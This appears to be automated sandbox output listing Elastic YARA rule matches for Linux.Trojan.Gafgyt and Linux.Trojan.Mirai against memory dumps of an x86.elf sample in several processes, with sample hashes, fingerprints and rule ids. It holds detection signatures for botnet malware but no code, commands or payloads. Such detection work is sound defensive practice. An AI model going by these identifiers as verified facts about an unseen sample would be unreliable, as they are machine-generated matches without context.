Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a, id = e0673a90-165e-4347-a965-e8d14fdf684b, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 reference_sample = 227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae, id = 31796a40-1cbe-4d0c-a785-d16f40765f4a, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1, id = 656bf077-ca0c-4d28-9daa-eb6baafaf467, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f, id = 32eb0c81-25af-4670-ab77-07ea7ce1874a, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec, id = 3fe3c668-89f4-4601-a167-f41bbd984ae5, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c, id = 637f2c04-98e4-45aa-b60a-14a96c6cebb7, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a, id = e0673a90-165e-4347-a965-e8d14fdf684b, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 reference_sample = 227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae, id = 31796a40-1cbe-4d0c-a785-d16f40765f4a, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1, id = 656bf077-ca0c-4d28-9daa-eb6baafaf467, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f, id = 32eb0c81-25af-4670-ab77-07ea7ce1874a, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec, id = 3fe3c668-89f4-4601-a167-f41bbd984ae5, last_modified = 2021-09-16
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c, id = 637f2c04-98e4-45aa-b60a-14a96c6cebb7, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6226, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6226, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6227, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6227, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6228, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6228, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6229, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6229, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
